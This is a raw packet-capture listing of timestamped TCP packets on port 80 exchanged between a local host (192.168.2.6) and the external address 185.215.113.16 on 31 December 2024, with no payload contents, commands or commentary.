Dec 31, 2024 09:48:43.859888077 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859898090 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.859918118 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.859940052 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860079050 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860095024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860105991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860116005 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860126019 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860126972 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860136032 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860146999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860152960 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860156059 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860166073 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860167027 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860176086 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860186100 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860193014 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860196114 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860218048 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860233068 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860280037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860291958 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860301971 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860325098 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860351086 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860363007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860373020 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860383034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860394001 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860394001 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860447884 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860447884 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860600948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860637903 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860647917 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860670090 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860743046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860754013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860764027 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860780001 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860785007 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860790968 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860800028 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860807896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860816956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860826969 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860827923 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860837936 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860847950 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860847950 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860858917 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860862017 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860867977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860879898 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860887051 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860889912 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860901117 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860912085 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860913038 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860927105 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860934973 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860950947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860966921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860977888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.860984087 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.860987902 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861005068 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861006975 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.861016035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861025095 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861027956 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.861037016 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861044884 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861056089 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.861148119 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.861181021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861191034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861201048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861221075 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.861229897 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861241102 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861242056 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.861252069 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861262083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861268997 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.861273050 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861294031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.861318111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861327887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861339092 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.861349106 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.861366987 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.905961990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.905975103 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.905986071 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.906025887 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.906692028 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.981523037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.981549978 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.981575966 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.981601954 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.981611967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.981688023 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983155012 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983181953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983206034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983228922 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983247995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983274937 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983297110 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983325005 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983351946 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983375072 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983390093 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983397961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983414888 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983423948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983505011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983520031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983529091 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983563900 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983578920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983613014 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983637094 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983650923 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983656883 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983695030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983705044 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983717918 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983741045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983750105 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983763933 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983788013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983807087 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983824968 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983844995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983858109 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983880997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983906031 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983922005 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983926058 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983954906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.983968019 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.983992100 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984034061 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984052896 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984085083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984119892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984122992 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984143972 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984168053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984180927 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984190941 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984215975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984222889 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984357119 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984380960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984416008 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984425068 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984440088 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984451056 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984464884 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984488010 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984512091 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984522104 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984548092 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984549046 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984572887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984597921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984621048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984631062 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984656096 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984657049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984682083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984704971 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984714031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984728098 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984751940 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984761953 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984772921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984797001 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984805107 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984823942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984846115 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984857082 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.984869957 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984894037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.984936953 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985167980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985192060 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985218048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985225916 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985251904 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985346079 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985382080 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985405922 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985429049 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985429049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985454082 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985476971 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985491991 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985500097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985517979 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985522985 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985547066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985569000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985584021 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985591888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985606909 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985615969 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985640049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985661983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985680103 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985687017 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985708952 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985709906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985733986 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985755920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985775948 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985781908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985800028 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985815048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985851049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985862970 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985872030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985894918 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985907078 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985918999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985940933 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985965967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985974073 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.985989094 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.985996962 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986013889 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986078024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986102104 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986114979 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986126900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986140966 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986149073 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986172915 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986196041 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986221075 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986227036 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986241102 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986242056 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986299992 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986320972 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986337900 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986351013 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986355066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986378908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986413002 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986418962 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986437082 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986459970 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986469984 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986494064 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986516953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986525059 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986541986 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986565113 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986572981 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986588955 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986608028 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986618042 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986646891 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986680031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986685991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986721039 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986745119 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986752987 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986768007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986793995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986808062 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986814022 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986836910 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986855984 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986860037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986882925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986896992 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986907005 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986929893 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986953974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986962080 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.986974001 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:43.986987114 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.987485886 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:43.988846064 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.031208992 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.031244993 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.031271935 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.031275988 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.031322002 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.106925964 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.106965065 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.106998920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.107018948 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.108190060 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108222961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108252048 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.108256102 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108489990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108505964 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.108519077 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108551979 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108556986 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.108584881 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108613014 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108627081 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.108675003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108725071 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108752966 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108764887 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.108791113 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.108802080 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108850956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108881950 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108891010 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.108926058 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108952999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.108992100 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109016895 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109056950 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109070063 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109117031 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109148979 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109163046 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109180927 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109214067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109224081 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109240055 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109271049 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109275103 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109302998 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109334946 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109348059 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109400034 CET	80	49754	185.215.113.16	192.168.2.6
